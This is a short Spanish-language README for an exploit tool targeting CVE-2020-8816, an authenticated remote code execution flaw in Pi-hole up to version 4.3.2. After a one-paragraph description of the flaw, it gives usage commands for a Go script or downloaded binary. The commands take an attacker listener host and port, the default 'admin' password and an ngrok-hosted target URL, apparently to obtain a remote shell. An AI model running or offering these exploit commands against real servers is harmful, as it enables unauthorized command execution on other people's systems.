
Pi-hole ( <= 4.3.2) ejecución remota de código autenticada.
Pi-hole (versiones <= 4.3.2 ) se ve afectado por una vulnerabilidad de ejecución remota de código. Un usuario autenticado del portal web puede ejecutar un comando arbitrario en el servidor subyacente con los privilegios del usuario local que ejecuta el servicio.
go run CVE-2020-8816.go -host $LHOST -p $LPORT -pass admin -u http://4c9a7a45fa37.ngrok.io/admin/
o descargue el binario CVE-2020-8816 :
./CVE-2020-8816 -host $LHOST -p $LPORT -pass admin -u http://4c9a7a45fa37.ngrok.io/admin/